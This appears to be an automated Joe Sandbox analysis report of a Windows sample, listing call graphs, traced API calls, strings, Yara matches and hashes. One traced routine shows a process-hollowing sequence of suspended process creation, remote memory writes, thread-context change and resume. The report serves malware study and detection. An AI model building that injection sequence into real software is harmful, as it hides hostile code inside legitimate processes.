20663 100ad9e 20660->20663 20665 100ad80 20660->20665 20661->20643 20662->20643 20664 100aa37 ___scrt_uninitialize_crt 8 API calls 20663->20664 20664->20643 20665->20643 20666 100a94e ___scrt_uninitialize_crt 7 API calls 20665->20666 20666->20643 20668 100e89d ___scrt_uninitialize_crt LeaveCriticalSection 20667->20668 20669 100ac37 20668->20669 20669->20639 20671 100a2a8 __FrameHandler3::FrameUnwindToState 20670->20671 20683 100e87a EnterCriticalSection 20671->20683 20673 100a2b7 20674 100a2fc 20673->20674 20684 100e951 20673->20684 20676 1001a7e __strnicoll 14 API calls 20674->20676 20678 100a303 20676->20678 20677 100a2e3 FlushFileBuffers 20677->20678 20679 100a2ef GetLastError 20677->20679 20700 100a332 20678->20700 20697 1001a6b 20679->20697 20683->20673 20685 100e973 20684->20685 20686 100e95e 20684->20686 20689 1001a6b __dosmaperr 14 API calls 20685->20689 20691 100e998 20685->20691 20687 1001a6b __dosmaperr 14 API calls 20686->20687 20688 100e963 20687->20688 20690 1001a7e __strnicoll 14 API calls 20688->20690 20692 100e9a3 20689->20692 20693 100e96b 20690->20693 20691->20677 20694 1001a7e __strnicoll 14 API calls 20692->20694 20693->20677 20695 100e9ab 20694->20695 20696 ffe61f __strnicoll 41 API calls 20695->20696 20696->20693 20698 1006de1 __dosmaperr 14 API calls 20697->20698 20699 1001a70 20698->20699 20699->20674 20701 100e89d ___scrt_uninitialize_crt LeaveCriticalSection 20700->20701 20702 100a31b 20701->20702 20702->20628 20703->20604 20704->20587 25060 1007ee3 25061 1007eef __FrameHandler3::FrameUnwindToState 25060->25061 25072 1000ecc EnterCriticalSection 25061->25072 25063 1007ef6 25073 100e7dc 25063->25073 25071 1007f14 25097 1007f3a 25071->25097 25072->25063 25074 100e7e8 __FrameHandler3::FrameUnwindToState 25073->25074 25075 100e7f1 25074->25075 25076 100e812 25074->25076 25077 1001a7e __strnicoll 14 API calls 25075->25077 25100 1000ecc EnterCriticalSection 25076->25100 25079 100e7f6 25077->25079 25080 ffe61f __strnicoll 41 API calls 25079->25080 25081 1007f05 25080->25081 25081->25071 25086 1007d7d GetStartupInfoW 25081->25086 25082 100e84a 25108 100e871 25082->25108 25084 100e81e 25084->25082 25101 100e72c 25084->25101 25087 1007d9a 25086->25087 25089 1007e2e 25086->25089 25088 100e7dc 42 API calls 25087->25088 25087->25089 25090 1007dc2 25088->25090 25092 1007e33 25089->25092 25090->25089 25091 1007df2 GetFileType 25090->25091 25091->25090 25093 1007e3a 25092->25093 25094 1007e7d GetStdHandle 25093->25094 25095 1007edf 25093->25095 25096 1007e90 GetFileType 25093->25096 25094->25093 25095->25071 25096->25093 25112 1000f14 LeaveCriticalSection 25097->25112 25099 1007f25 25100->25084 25102 10074ab _unexpected 14 API calls 25101->25102 25105 100e73e 25102->25105 25103 100e74b 25104 1006f7b ___free_lconv_mon 14 API calls 25103->25104 25106 100e7a0 25104->25106 25105->25103 25107 1007ab6 6 API calls 25105->25107 25106->25084 25107->25105 25111 1000f14 LeaveCriticalSection 25108->25111 25110 100e878 25110->25081 25111->25110 25112->25099 25170 1004ef5 25173 1004bc1 25170->25173 25174 1004bcd __FrameHandler3::FrameUnwindToState 25173->25174 25181 1000ecc EnterCriticalSection 25174->25181 25176 1004bd7 25177 1004c05 25176->25177 25179 100f9e8 __Getctype 14 API calls 25176->25179 25182 1004c23 25177->25182 25179->25176 25181->25176 25185 1000f14 LeaveCriticalSection 25182->25185 25184 1004c11 25185->25184

                                              Control-flow Graph

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00FC02FC
                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00FC030F
                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00FC032D
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FC0351
                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00FC037C
                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00FC03D4
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00FC041F
                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FC045D
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00FC0499
                                              • ResumeThread.KERNELBASE(?), ref: 00FC04A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070795087.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_fc0000_file.jbxd
                                              Similarity
                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                              • String ID: GetP$Load$aryA$ress
                                              • API String ID: 2687962208-977067982
                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                              • Instruction ID: 2d8050ab5891d0a4540092cc26a8eb2fb4184bfec8869ce81db4866dcfd15df5
                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                              • Instruction Fuzzy Hash: 70B1E67664028AAFDB60CF68CD80BDA77A5FF88714F158524EA0CAB341D774FA418B94

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 209 100c44b-100c463 GetPEB 210 100c474-100c476 209->210 211 100c465-100c469 call 100782c 209->211 213 100c477-100c47b 210->213 214 100c46e-100c472 211->214 214->210 214->213
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f85d9542f9fa04762e64eeb86abc2242e9e055aa6ff6fe517803ae84507f4694
                                              • Instruction ID: 1ea6429142d3165c1ea541681513ae9eb51cbade08a8921ef4b8de7bd2d5827d
                                              • Opcode Fuzzy Hash: f85d9542f9fa04762e64eeb86abc2242e9e055aa6ff6fe517803ae84507f4694
                                              • Instruction Fuzzy Hash: 9DE08C32915228EBDB16DBDCCA049AAF7ECFB45B00F520296BA91D3151C674DE00CBD0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 240 10049aa call 100c44b 242 10049af-10049b2 240->242 243 10049b4-10049c4 GetPEB 242->243 244 10049c9-10049cb 242->244 243->244 245 10049c6-10049c8 243->245
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df0474aabbf662809a2ff9b2b7148a1b0acd074440912c506b34a876e1c2f8a3
                                              • Instruction ID: ddb01cc04b67f39d615484118f6b691abb923357b876deb0ab2df1f400433cac
                                              • Opcode Fuzzy Hash: df0474aabbf662809a2ff9b2b7148a1b0acd074440912c506b34a876e1c2f8a3
                                              • Instruction Fuzzy Hash: 99C08CB400090087FE2B8A1892B03B43395F391782F900ADDCBC28B6C2C91E9882D601

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00FF5397
                                                • Part of subcall function 00FF2241: _strlen.LIBCMT ref: 00FF2259
                                              • _strlen.LIBCMT ref: 00FF53B2
                                              • _strlen.LIBCMT ref: 00FF53C8
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00FF53E5
                                              • RegEnableReflectionKey.ADVAPI32(00000000), ref: 00FF53F6
                                              • DeleteAce.ADVAPI32(00000000,00000000), ref: 00FF5416
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strlen$AddressDeleteEnableHandleModuleProcReflection
                                              • String ID: Cons$Free$SVWj@h$kernel32.dll$ole
                                              • API String ID: 1962689627-3241830502
                                              • Opcode ID: f06a1e98d876164586c29352e5004338724ab6eeedca430b863ffac3f7c86806
                                              • Instruction ID: 03d8871abf08c69aa30762fd1918a84f0ea802e1dcb35b41e35e5a097fdd2cfb
                                              • Opcode Fuzzy Hash: f06a1e98d876164586c29352e5004338724ab6eeedca430b863ffac3f7c86806
                                              • Instruction Fuzzy Hash: 1111DF31D00208ABCB15EBA0DC459FFBBB8EF45760B100119F541A30A5DF7CAE02EBA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 47 10076de-10076ea 48 100777c-100777f 47->48 49 1007785 48->49 50 10076ef-1007700 48->50 51 1007787-100778b 49->51 52 1007702-1007705 50->52 53 100770d-1007726 LoadLibraryExW 50->53 56 10077a5-10077a7 52->56 57 100770b 52->57 54 1007728-1007731 GetLastError 53->54 55 100778c-100779c 53->55 59 1007733-1007745 call 1006918 54->59 60 100776a-1007777 54->60 55->56 61 100779e-100779f FreeLibrary 55->61 56->51 58 1007779 57->58 58->48 59->60 64 1007747-1007759 call 1006918 59->64 60->58 61->56 64->60 67 100775b-1007768 LoadLibraryExW 64->67 67->55 67->60
                                              APIs
                                              • FreeLibrary.KERNEL32(00000000,?,010077EB,00000000,01006599,00000000,00000000,?,?,01007A15,00000021,FlsSetValue,0101B3E8,0101B3F0,00000000), ref: 0100779F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: api-ms-$ext-ms-
                                              • API String ID: 3664257935-537541572
                                              • Opcode ID: b858f8c5979fc42a10a6e49dd8cb2ae54b77f7dd45447b9ac64bb14b06d95521
                                              • Instruction ID: 9b9c7c600486d6475d5d6a4cd6b409632febba2d2981121af15fe14c3945dbb1
                                              • Opcode Fuzzy Hash: b858f8c5979fc42a10a6e49dd8cb2ae54b77f7dd45447b9ac64bb14b06d95521
                                              • Instruction Fuzzy Hash: 4D219635A01211EBEB739669DC44A5A3799BB417A0F250154E9CBA72C5EB3DF900C6E0

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00FF524A
                                              • CreateThread.KERNELBASE(00000000,00000000,00000188,01023040,00000000,00000000), ref: 00FF527B
                                              • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 00FF5285
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocCreateObjectSingleThreadVirtualWait
                                              • String ID:
                                              • API String ID: 2947710671-0
                                              • Opcode ID: 193be21e91f1035beb3b27b58ede4abe6da6f6eef00fe2e8ea88ecda600f9f15
                                              • Instruction ID: ff4c272beac32b6b52534674e7ee4c164ec19b7404781a5a067858ee80414dd7
                                              • Opcode Fuzzy Hash: 193be21e91f1035beb3b27b58ede4abe6da6f6eef00fe2e8ea88ecda600f9f15
                                              • Instruction Fuzzy Hash: 95E092F5700318BAE63222B29CCAFB7361CDB85BF5B000928F795A5085C96D9C009271

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,01004930,?,?,?,?,9B609FF6), ref: 01004947
                                              • TerminateProcess.KERNEL32(00000000,?,01004930,?,?,?,?,9B609FF6), ref: 0100494E
                                              • ExitProcess.KERNEL32 ref: 01004960
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 8201cc7c2bbf350581874a46a0a958e9607074dd5c2b739c70ba222c64612bd5
                                              • Instruction ID: 7043d1afe234133a964dca261808360ac0526d8a5ba2c9b3c432bafe0d87092a
                                              • Opcode Fuzzy Hash: 8201cc7c2bbf350581874a46a0a958e9607074dd5c2b739c70ba222c64612bd5
                                              • Instruction Fuzzy Hash: 8DD09E35000205EFEF632F60D80C9993F26AF50245B504060BB89860B5DB3A9A95DB95

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00FF6F33: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,00FF6F85,00000000,?,00FF6FC6,00000000,?,00FF4225,00000000), ref: 00FF6F3F
                                              • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,9B609FF6,?,?,?,0101661D,000000FF), ref: 00FF7039
                                                • Part of subcall function 00FF4EB2: std::_Throw_Cpp_error.LIBCPMT ref: 00FF4ED3
                                                • Part of subcall function 00FF615F: ReleaseSRWLockExclusive.KERNEL32(00FF3E12,?,00FF3E1A,?,?,?,?,?,?,?,?,?,?,?,?,00FF1342), ref: 00FF6173
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                              • String ID:
                                              • API String ID: 3627539351-0
                                              • Opcode ID: e16cc4ad5601a67bb5e674da726ee4524bb0f539cabdc92d2736f0be4e00e43f
                                              • Instruction ID: 34d85cd79c7022ce128318318b3f8dac59b5b1e578ca6ca3d236c5af795b9bc7
                                              • Opcode Fuzzy Hash: e16cc4ad5601a67bb5e674da726ee4524bb0f539cabdc92d2736f0be4e00e43f
                                              • Instruction Fuzzy Hash: 98119332A04618ABCB256B25AC0663EB764EF40B24B00041EFB55972B1DF7EA801EA90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 112 10077a9-10077d1 113 10077d3-10077d5 112->113 114 10077d7-10077d9 112->114 115 1007828-100782b 113->115 116 10077db-10077dd 114->116 117 10077df-10077e6 call 10076de 114->117 116->115 119 10077eb-10077ef 117->119 120 10077f1-10077ff GetProcAddress 119->120 121 100780e-1007825 119->121 120->121 123 1007801-100780c call 10040b7 120->123 122 1007827 121->122 122->115 123->122
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dcdcb7d8b618499f7414cf419fea2f7f99fa0f272b00f65bdfb0077614a3b81d
                                              • Instruction ID: 29e79a148f7c17fd30ebaf7bd51424dc0445595520e4e12e75ab1be915d1bbd6
                                              • Opcode Fuzzy Hash: dcdcb7d8b618499f7414cf419fea2f7f99fa0f272b00f65bdfb0077614a3b81d
                                              • Instruction Fuzzy Hash: 8301B5377402159BBB279D6DEC4495B3BD6FB85264B644124FAC5CB1C8EB39E802C790
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: fafe874b0234ca5375a478118fb1965e6dd96c433c61447cd03320646e670ab8
                                              • Instruction ID: 523be830619d2dab064662d06350da9fcefe01a01bb8e51034acbc26d9cb92ca
                                              • Opcode Fuzzy Hash: fafe874b0234ca5375a478118fb1965e6dd96c433c61447cd03320646e670ab8
                                              • Instruction Fuzzy Hash: 93D22871E082298FDB69CE28DD407EAB7F5EB48344F1441EAD58DE7244E778AE818F41
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,01010BE2,00000002,00000000,?,?,?,01010BE2,?,00000000), ref: 0101095D
                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,01010BE2,00000002,00000000,?,?,?,01010BE2,?,00000000), ref: 01010986
                                              • GetACP.KERNEL32(?,?,01010BE2,?,00000000), ref: 0101099B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: b8e278cdf34670ddccb67c277bdece2535bb9c2e2a60eb5e0b6767bc43db8275
                                              • Instruction ID: e229c69b0d22e48000027096c85ff420efcd743b9bca7d38b013c82b9fd482bc
                                              • Opcode Fuzzy Hash: b8e278cdf34670ddccb67c277bdece2535bb9c2e2a60eb5e0b6767bc43db8275
                                              • Instruction Fuzzy Hash: 6D21FB72700104AAFB758F5DC920AAB77E7BF40A60B5680A4F9C9D710DEB3ADAC1C750
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 01010BA5
                                              • IsValidCodePage.KERNEL32(00000000), ref: 01010BEE
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 01010BFD
                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 01010C45
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 01010C64
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                              • String ID:
                                              • API String ID: 415426439-0
                                              • Opcode ID: 74e5a57bc200e92f6f476c46093c8209803cca7561ae0fdcb14f35426e89a903
                                              • Instruction ID: c883d19a7d51fa3221a54ae501849da725b914f6e105fe022a759c7d51025e1a
                                              • Opcode Fuzzy Hash: 74e5a57bc200e92f6f476c46093c8209803cca7561ae0fdcb14f35426e89a903
                                              • Instruction Fuzzy Hash: D8515471A0020A9FEB51DFA9DC84ABE77F8BF54704F0444A9BAD0DB19CD7789580CB61
                                              APIs
                                                • Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
                                                • Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36
                                              • GetACP.KERNEL32(?,?,?,?,?,?,010052E9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 010101F6
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,010052E9,?,?,?,00000055,?,-00000050,?,?), ref: 01010221
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 01010384
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$CodeInfoLocalePageValid
                                              • String ID: utf8
                                              • API String ID: 607553120-905460609
                                              • Opcode ID: f229e2d9c725114161c483d12c9b9e8a472a9b1753c283c30c0affd0bf48cb5d
                                              • Instruction ID: b64940e77829b26cf8d1c9b0f41f9fdfb404287f4c4ac4cd739eced7a6faf243
                                              • Opcode Fuzzy Hash: f229e2d9c725114161c483d12c9b9e8a472a9b1753c283c30c0affd0bf48cb5d
                                              • Instruction Fuzzy Hash: 3771D571600206ABE725AB78CC45AAB77ECEF59700F148069F6C59718CEB7CE9818760
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                              • Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strrchr
                                              • String ID:
                                              • API String ID: 3213747228-0
                                              • Opcode ID: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
                                              • Instruction ID: 86af75df216bc87549ef01ea944c2691a66cbf0b9aed5450568bb719d905aa5a
                                              • Opcode Fuzzy Hash: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
                                              • Instruction Fuzzy Hash: 3FB12872D046459FEB178F68C881BEEBBE5FF95310F15C1ABE985AB2C1D2349901C7A0
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FFA536
                                              • IsDebuggerPresent.KERNEL32 ref: 00FFA602
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFA61B
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00FFA625
                                              Memory Dump Source
